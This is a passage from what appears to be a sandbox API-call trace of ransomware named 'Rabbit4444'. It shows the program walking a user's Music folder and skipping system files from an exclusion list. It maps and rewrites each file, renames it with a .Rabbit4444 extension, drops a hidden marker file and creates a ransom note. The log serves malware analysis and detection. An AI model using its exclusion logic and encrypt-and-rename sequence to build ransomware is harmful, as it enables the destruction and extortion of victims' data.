dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xecc0) returned 0x70000 [0049.028] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.028] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.028] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.028] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.029] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14033960752) returned 1 [0049.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0049.029] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.030] CloseHandle (hObject=0x298) returned 1 [0049.030] CloseHandle (hObject=0x278) returned 1 [0049.032] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\BTTuE.wav.Rabbit4444") returned 58 [0049.032] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\BTTuE.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\bttue.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\BTTuE.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\bttue.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.033] InterlockedExchangeAdd (in: Addend=0xff618, Value=59840 | out: Addend=0xff618) returned 19341568 [0049.033] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3463 [0049.033] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c19bf70, ftCreationTime.dwHighDateTime=0x1d4ca29, ftLastAccessTime.dwLowDateTime=0x54879490, ftLastAccessTime.dwHighDateTime=0x1d4d0d5, ftLastWriteTime.dwLowDateTime=0x54879490, ftLastWriteTime.dwHighDateTime=0x1d4d0d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mLo6a3P6q3fcpY", cAlternateFileName="MLO6A3~1")) returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="Rabbit4444.exe") returned -1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2=".") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="..") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="windows") returned -1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="bootmgr") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="pagefile.sys") returned -1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="boot") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="ids.txt") returned 1 [0049.033] lstrcmpiW (lpString1="mLo6a3P6q3fcpY", lpString2="NTUSER.DAT") returned -1 [0049.033] lstrcpyW (in: lpString1=0x130eb84, lpString2="mLo6a3P6q3fcpY" | out: lpString1="mLo6a3P6q3fcpY") returned="mLo6a3P6q3fcpY" [0049.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0049.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117b30 [0049.033] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6450 [0049.033] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ebea220, ftCreationTime.dwHighDateTime=0x1d4d2cc, ftLastAccessTime.dwLowDateTime=0x41b10690, ftLastAccessTime.dwHighDateTime=0x1d4d480, ftLastWriteTime.dwLowDateTime=0x41b10690, ftLastWriteTime.dwHighDateTime=0x1d4d480, nFileSizeHigh=0x0, nFileSizeLow=0xa745, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VF2Fp5QeqqLYfl8gl.m4a", cAlternateFileName="VF2FP5~1.M4A")) returned 1 [0049.033] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.033] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.033] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="Rabbit4444.exe") returned 1 [0049.033] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2=".") returned 1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="..") returned 1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="windows") returned -1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="bootmgr") returned 1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="pagefile.sys") returned 1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="boot") returned 1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="ids.txt") returned 1 [0049.034] lstrcmpiW (lpString1="VF2Fp5QeqqLYfl8gl.m4a", lpString2="NTUSER.DAT") returned 1 [0049.034] lstrcpyW (in: lpString1=0x130eb84, lpString2="VF2Fp5QeqqLYfl8gl.m4a" | out: lpString1="VF2Fp5QeqqLYfl8gl.m4a") returned="VF2Fp5QeqqLYfl8gl.m4a" [0049.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\VF2Fp5QeqqLYfl8gl.m4a", dwFileAttributes=0x0) returned 1 [0049.034] lstrlenW (lpString="VF2Fp5QeqqLYfl8gl.m4a") returned 21 [0049.034] lstrlenW (lpString="Rabbit4444") returned 10 [0049.034] lstrcmpiW (lpString1="Yfl8gl.m4a", lpString2="Rabbit4444") returned 1 [0049.034] lstrlenW (lpString=".dll") returned 4 [0049.034] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.034] lstrlenW (lpString=".lnk") returned 4 [0049.034] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.034] lstrlenW (lpString=".ini") returned 4 [0049.034] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.034] lstrlenW (lpString=".sys") returned 4 [0049.034] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\VF2Fp5QeqqLYfl8gl.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\vf2fp5qeqqlyfl8gl.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.034] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.034] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14034518724) returned 1 [0049.034] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=42821) returned 1 [0049.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0049.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0049.035] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaa50, lpName=0x0) returned 0x298 [0049.035] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaa50) returned 0x70000 [0049.036] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.036] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.036] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.036] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.036] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14034711274) returned 1 [0049.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0049.036] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0049.036] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.037] CloseHandle (hObject=0x298) returned 1 [0049.037] CloseHandle (hObject=0x278) returned 1 [0049.041] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\VF2Fp5QeqqLYfl8gl.m4a.Rabbit4444") returned 70 [0049.041] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\VF2Fp5QeqqLYfl8gl.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\vf2fp5qeqqlyfl8gl.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\VF2Fp5QeqqLYfl8gl.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\vf2fp5qeqqlyfl8gl.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.042] InterlockedExchangeAdd (in: Addend=0xff618, Value=42832 | out: Addend=0xff618) returned 19401408 [0049.042] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3465 [0049.042] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d5d930, ftCreationTime.dwHighDateTime=0x1d4c5f8, ftLastAccessTime.dwLowDateTime=0x5dc33390, ftLastAccessTime.dwHighDateTime=0x1d4cd18, ftLastWriteTime.dwLowDateTime=0x5dc33390, ftLastWriteTime.dwHighDateTime=0x1d4cd18, nFileSizeHigh=0x0, nFileSizeLow=0xb67d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZaPyz5 MC4yqLqS.m4a", cAlternateFileName="ZAPYZ5~1.M4A")) returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="Rabbit4444.exe") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2=".") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="..") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="windows") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="bootmgr") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="pagefile.sys") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="boot") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="ids.txt") returned 1 [0049.042] lstrcmpiW (lpString1="ZaPyz5 MC4yqLqS.m4a", lpString2="NTUSER.DAT") returned 1 [0049.042] lstrcpyW (in: lpString1=0x130eb84, lpString2="ZaPyz5 MC4yqLqS.m4a" | out: lpString1="ZaPyz5 MC4yqLqS.m4a") returned="ZaPyz5 MC4yqLqS.m4a" [0049.042] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\ZaPyz5 MC4yqLqS.m4a", dwFileAttributes=0x0) returned 1 [0049.042] lstrlenW (lpString="ZaPyz5 MC4yqLqS.m4a") returned 19 [0049.042] lstrlenW (lpString="Rabbit4444") returned 10 [0049.042] lstrcmpiW (lpString1="4yqLqS.m4a", lpString2="Rabbit4444") returned -1 [0049.042] lstrlenW (lpString=".dll") returned 4 [0049.042] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.042] lstrlenW (lpString=".lnk") returned 4 [0049.042] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.042] lstrlenW (lpString=".ini") returned 4 [0049.042] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.042] lstrlenW (lpString=".sys") returned 4 [0049.043] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.043] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\ZaPyz5 MC4yqLqS.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\zapyz5 mc4yqlqs.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.043] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.043] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14035344575) returned 1 [0049.043] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46717) returned 1 [0049.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0049.043] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb980, lpName=0x0) returned 0x298 [0049.043] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb980) returned 0x70000 [0049.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.045] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.045] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.045] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.045] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14035554256) returned 1 [0049.045] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.045] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0049.045] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.045] CloseHandle (hObject=0x298) returned 1 [0049.045] CloseHandle (hObject=0x278) returned 1 [0049.047] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\ZaPyz5 MC4yqLqS.m4a.Rabbit4444") returned 68 [0049.047] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\ZaPyz5 MC4yqLqS.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\zapyz5 mc4yqlqs.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\ZaPyz5 MC4yqLqS.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\zapyz5 mc4yqlqs.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.048] InterlockedExchangeAdd (in: Addend=0xff618, Value=46720 | out: Addend=0xff618) returned 19444240 [0049.048] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3466 [0049.048] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d5d930, ftCreationTime.dwHighDateTime=0x1d4c5f8, ftLastAccessTime.dwLowDateTime=0x5dc33390, ftLastAccessTime.dwHighDateTime=0x1d4cd18, ftLastWriteTime.dwLowDateTime=0x5dc33390, ftLastWriteTime.dwHighDateTime=0x1d4cd18, nFileSizeHigh=0x0, nFileSizeLow=0xb67d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZaPyz5 MC4yqLqS.m4a", cAlternateFileName="ZAPYZ5~1.M4A")) returned 0 [0049.048] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0049.048] lstrcpyW (in: lpString1=0x130eb84, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.048] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.049] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.050] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.050] CloseHandle (hObject=0x278) returned 1 [0049.050] CloseHandle (hObject=0x27c) returned 1 [0049.050] GetCurrentThreadId () returned 0xd98 [0049.051] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0049.051] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY" [0049.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0049.051] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY" [0049.051] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\" [0049.051] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\.BFC0E91B00AE8A0620D3" [0049.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\mlo6a3p6q3fcpy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.052] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.054] FlushFileBuffers (hFile=0x27c) returned 1 [0049.056] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.056] CloseHandle (hObject=0x27c) returned 1 [0049.056] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY") returned 52 [0049.056] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.056] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\mLo6a3P6q3fcpY\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c19bf70, ftCreationTime.dwHighDateTime=0x1d4ca29, ftLastAccessTime.dwLowDateTime=0x54879490, ftLastAccessTime.dwHighDateTime=0x1d4d0d5, ftLastWriteTime.dwLowDateTime=0xe68f97f1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0049.057] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.057] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.057] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.057] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.057] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c19bf70, ftCreationTime.dwHighDateTime=0x1d4ca29, ftLastAccessTime.dwLowDateTime=0x54879490, ftLastAccessTime.dwHighDateTime=0x1d4d0d5, ftLastWriteTime.dwLowDateTime=0xe68f97f1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.057] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.057] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.057] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.057] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.057] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.057] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe68f97f1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe68f97f1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe68f97f1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.057] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.057] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.057] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e921e50, ftCreationTime.dwHighDateTime=0x1d4cd29, ftLastAccessTime.dwLowDateTime=0x784867e0, ftLastAccessTime.dwHighDateTime=0x1d4d1f9, ftLastWriteTime.dwLowDateTime=0x784867e0, ftLastWriteTime.dwHighDateTime=0x1d4d1f9, nFileSizeHigh=0x0, nFileSizeLow=0x10a0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ahtik 3dEIDK LesPgbT.mp3", cAlternateFileName="AHTIK3~1.MP3")) returned 1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="Rabbit4444.exe") returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2=".") returned 1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="..") returned 1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="windows") returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="bootmgr") returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="pagefile.sys") returned -1 [0049.057] lstrcmpiW (lpString1="ahtik 3dEIDK LesPgbT.mp3", lpString2="boot") 